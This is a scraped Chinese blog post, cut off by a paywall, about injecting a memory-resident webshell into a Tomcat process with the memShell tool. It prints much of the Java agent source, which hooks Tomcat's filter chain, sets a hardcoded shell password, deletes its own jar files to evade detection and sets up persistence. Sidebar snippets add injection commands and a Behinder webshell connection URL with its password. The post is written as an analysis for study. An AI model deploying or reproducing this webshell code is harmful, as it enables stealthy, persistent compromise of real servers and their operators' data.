tomcat进程注入

最新推荐文章于 2024-07-28 08:30:00 发布
原创 最新推荐文章于 2024-07-28 08:30:00 发布 · 1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#tomcat #java #web安全

跟随上一篇《java进程注入》
这里使用memShell
https://github.com/rebeyond/memShell
将agent.jar和inject.jar放到tomcta的web目录下
在这里插入图片描述
然后输入命令注入
效果:
在这里插入图片描述
注入成功后
在这里插入图片描述
可以看到agent.jar文件为了防止发现,自动清除,而且重启电脑之后,内存马不死,继续可以使用

那么memShell分析
主要是下面三个类:
agent.java,Attach.java,Transformer.java
agent.java:

package net.rebeyond.memshell;

import javax.management.MBeanServer;
import javax.management.ObjectName;
import javax.management.Query;
import java.io.*;
import java.lang.instrument.Instrumentation;
import java.lang.management.ManagementFactory;
import java.lang.management.RuntimeMXBean;
import java.net.HttpURLConnection;
import java.net.InetAddress;
import java.net.URL;
import java.util.Arrays;
import java.util.Set;

public class Agent {
   
   
    public static String currentPath;
    public static String password = "qiezi";

    public static String className = "org.apache.catalina.core.ApplicationFilterChain";

    public static byte[] injectFileBytes = new byte[]{
   
   },agentFileBytes = new byte[]{
   
   };

    public static void agentmain(String agentArgs, Instrumentation inst){
   
   
        inst.addTransformer(new Transformer(),true);
        if (agentArgs.indexOf("^") >=0){
   
        //字符串的开始位置找元素^找不到是-1.找到进入判断
            Agent.currentPath = agentArgs.split("\\^")[0]; //以^分割字符,返回分割好的字符串数组,然后得到数组第一个元素
            Agent.password = agentArgs.split("\\^")[1];  //以以^分割字符,返回分割好的字符串数组,然后得到数组第二个元素

        }else {
   
   
            Agent.currentPath = agentArgs;
        }
        System.out.println("Agent Main Done");
        Class[] loadedClasses = inst.getAllLoadedClasses();  //获得Instrumentation中的所有类
        for (Class c : loadedClasses){
   
     //遍历
            if (c.getName().equals(className)){
   
     //当等于"org.apache.catalina.core.ApplicationFilterChain"时进入if
                try{
   
   
                    inst.retransformClasses(c);  //重新加载,为了达到全部监视,像thread类是在java agent加载之前就已经加载了,所以需要再次加载
                }catch (Exception e){
   
   
                    e.printStackTrace();
                }
            }
        }

        try {
   
   
            initLoad();   //初始化
            readInjectFile(Agent.currentPath);   //读取inject文件
            readAgentFile(Agent.currentPath);    //读取agent文件
            clear(Agent.currentPath);  //清除文件
        }catch (Exception e){
   
   

        }
        Agent.persist();   //持久化
    }

    //linux?
    public static void clear(String currentPath) throws Exception{
   
      //清除
        Thread clearThread = new Thread(){
   
      //创建清除线程
            String currentPath = Agent.currentPath;  //当前路径
            public void run(){
   
   
                try {
   
   
                    Thread.sleep(5000);   //线程等待
                    String injectFile = currentPath + "inject.jar";   //inject文件路径
                    String agentFile = currentPath + "agent.jar";     //agent文件路径
                    new File(injectFile).getCanonicalFile().delete();  //删除injectFiile文件
                    String OS = System.getProperty("os.name").toLowerCase();  //操作系统名
                    if (OS.indexOf("windows") >= 0){
   
   
                        try{
   
   
                            unlockFile(currentPath);  //windows采取foreceDelete.exe强制清除
                        }catch (Exception e){
   
   
                            //pass
                        }

                    }
                    new File(agentFile)
最低0.47元/天 解锁文章
Java 开发者如何进行 Tomcat 的日常维护
Java大师兄的博客
04-14 883
Tomcat 作为一款广泛使用的开源 Servlet 容器,在 Java Web 开发中扮演着至关重要的角色。对于 Java 开发者而言,掌握 Tomcat 的日常维护技能,能够确保 Web 应用的稳定运行、提高性能、及时处理各类故障。本文的目的就是为 Java 开发者提供一套全面、详细的 Tomcat 日常维护指南,范围涵盖 Tomcat 的安装配置、性能优化、日志管理、故障排查等多个方面。本文将按照以下结构展开:首先介绍 Tomcat 的核心概念与联系,让读者对 Tomcat 的架构有清晰的认识;
Java 领域:Tomcat 配置文件的加密与安全存储
最新发布
AI开发架构师
06-03 796
Tomcat作为最流行的Java Web服务器之一,广泛应用于企业级应用部署。然而,其配置文件(如server.xml、context.xml、web.xml等)中经常包含数据库密码、API密钥等敏感信息,这些信息以明文形式存储存在严重的安全隐患。本文旨在提供一套完整的解决方案,帮助开发者实现Tomcat配置文件中敏感信息的加密存储,同时保证应用能够正常解密和使用这些信息。我们将覆盖从基础概念到高级实现的全方位内容,包括加密算法选择、密钥管理策略以及实际部署注意事项。背景介绍:阐述问题和目标。
java】模拟实现Spring_IOC--jar包类注入
weixin_43148189的博客
10-10 1084
前言 此篇博文专注解决非普通类的注入问题; jar包中的类为class文件,即,二进制文件,因此不能随意修改类中的代码,所以不能像普通类一样通过给目标类加上Component注解的方式,实现将该类的对象放入Bean容器中的操作;所以jar包中类的注入与普通类的注入方式不同。 基本思路 @Bean public ClassOne getClassOne() { return new Cla...
tomcat项目注入
CherishL_的专栏
07-22 1718
tomcat管理台用户名密码没有改,全为admin,偶然发现webapps下多了如下代码,呵呵哒 大家一起分下下吧<%@ page contentType="text/html; charset=GBK" %> <%@ page import="java.io.*"%> <%@ page import="java.util.Map"%> <%@ page import="java.util.Has
Tomcat注入到系统服务中,实现服务自启动及常驻
weixin_30311605的博客
10-09 227
步骤一、打开service.bat 并修改(推荐notepad++): 1、set SERVICE_NAME=Tomcat6(服务名称,可在命令行中通过该名字进行服务的控制(启动/关闭)) 2、set PR_DISPLAYNAME=Apache Tomcat7(服务管理器中显示的名称,请遵守相关规范) 步骤二 、...
Tomcat注入到系统服务中,快速启动
qq_38667881的博客
11-16 499
window系统 步骤一、在bin目录下找到service.bat编辑 :        1、set SERVICE_NAME=Tomcat6(服务名称,可在命令行中通过该名字进行服务的控制(启动/关闭))        2、set  PR_DISPLAYNAME=Apache Tomcat7(服务管理器中显示的名称,请遵守相关规范) 步骤二 、注入服务管理器中         1、...
基于Tomcat的无文件冰蝎内存马实现与注入
其中,inject.jar 应当是一个具备进程注入能力的辅助工具,可能基于Java Attach API 实现对目标JVM进程的动态连接;agent.jar 则是真正的内存马Agent主体,内含恶意字节码逻辑,能够在JVM启动或运行期间通过premain...
Tomcat 安全配置与性能优化
07-28 538
即父进程所有者是root用户,子进程与多线程所有者是一个非root用户,这个用户没有shell,无法通过ssh与控制台登陆系统,Java 的JVM 是与系统无关的,是建立在OS之上的,你使用什么用户启动Tomcat,那麽Tomcat 就会继承该所有者的权限。每次升级将压错包解压到 /www/http://example.com/目录下,http://www.example.com 是符号连接,连接到刚刚解压的目录。我的Tomcat安装在/srv目录下,但应用程序放在/www目录下,一般是这样的结构。
Tomcat源码中寻找request路径进行注入
ALLEN'Blog
02-20 493
前面主要是通过寻找一个全局存储的request / response来进行Tomcat中间下的回显,但是在tomcat7环境下并不能够获取到对象,这里李三师傅在前文的基础中发现了在的调用中不仅像之前的思路一样将获取到的对象存放在了global属性中。同样通过调用方法将对象进行组件的注册流程中。
memshell:Tomcat 冰蝎内存马
04-13
Tomcat 无文件冰蝎内存马 使用以下命令创建tomcat容器,并将inject.jar,agent.jar复制到容器中。 docker run -d -ti --net host --name tomcat tomcat:8.0.18-jre8 docker cp inject.jar tomcat:/usr/local/tomcat docker cp agent.jar tomcat:/usr/local/tomcat 使用以下命令将其注入tomcat进程中。 java -jar inject.jar 123 通过behinder.jar连接内存冰蝎马,url格式: http://ip:port/1.jsp?pass_the_world=123&model=chopper 密码: rebeyond
结合反序列化注入tomcat内存马
白帽子凯哥哥的博客
05-24 1512
通过前几个内存马的学习我们可以知道,将内存马写在jsp文件上传并不是传统意义上的内存马注入,jsp文件本质上就是一个servlet,servlet会编译成class文件,也会实现文件落地。借用木头师傅的一张图结合反序列化注入内存马是动态注入内存马的常用方法,然而通过反序列化注入的方式没有jsp文件的request内置类,所以获取回显的方式我们也需要考虑,在此写下这篇文章分析总结反序列化注入的方法细节。读者福利 |优快云大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
Linux下通过管道杀死所有与tomcat相关的进程
weixin_34224941的博客
03-22 166
先将正确的命令放上来: ps -ef | grep "tomcat" | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef将系统中运行的进程展示出来 选择带有tomcat进程后同时去除自身带有grep的进程,毕竟本身运行的这条命令是与tomcat相关的 awk可以将第二列的进程id显示出来 最后所得的一些列结果通过xa...
Jar代码注入
云守护的专栏
03-04 2244
有段时间没有写博客了,主要的原因是期末考试和回老家过年,这段时间基本上没有看相关的内容,不过还是有很多可以用来分享的。 就像前一篇日志提到的一样,Java可以从字节码的方式进行玩耍。通过使用Javassist这个类库,可以很方便的进行字节码的操作。 从这个角度讲,有很多我们之前没有想到的方面也可以进行实施。比如说有这么一个jar包,需要进行引用开发,于是乎,我们可以进行一些简单的恶作剧
Tomcat内存马学习5:Agent型
weixin_43263451的博客
08-10 597
具体点来说就是通过VirtualMachine 类的 attach(pid) 方法,可以连接到一个运行中的 java 进程上之后便可以通过 loadAgent(agentJarPath) 来将恶意agent 的 jar 包注入到对应的进程,然后对应的进程会调用agentmain方法,这个方法会遍历所有的已加载类并找到我们需要的类,修改其字节码从而达到注入内存马目的。大体思路都写在了代码注释里。(需要上传到对方服务器)以上三个文件打包为jar。...
Java MemShell
hibari_18的博客
01-27 2368
0x00 目录0x01 内存马的类型0x02 植入内存马的各种工具1.Tomcat 无文件内存马(Java Instrumentation类Agent型)2.Godzilla 2.9 (Servlet-api类 servlet型)3.Servlet-api类Filter型4.Servlet-api类 Listener型5.Spring类 Controller型6.Spring类 Interceptor类0x03 开源工具流量特征0x04 检测工具1.c0ny1开发的内存马检测工具2.VisualVM0x05
深入研究Tomcat内存马的攻击技术
hackzkaq的博客
11-16 643
Tomcat内存马(Tomcat Memory Shell)是一种利用Apache Tomcat服务器的漏洞,将恶意代码注入Tomcat进程的内存中的攻击技术ServletContextListener:用于监听整个 Servlet 上下文(创建、销毁)ServletContextAttributeListener:对 Servlet 上下文属性进行监听(增删改属性)ServletRequestListener:对 Request 请求进行监听(创建、销毁)
网络安全 log4j漏洞复现
jazzz98的博客
06-19 3926
log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值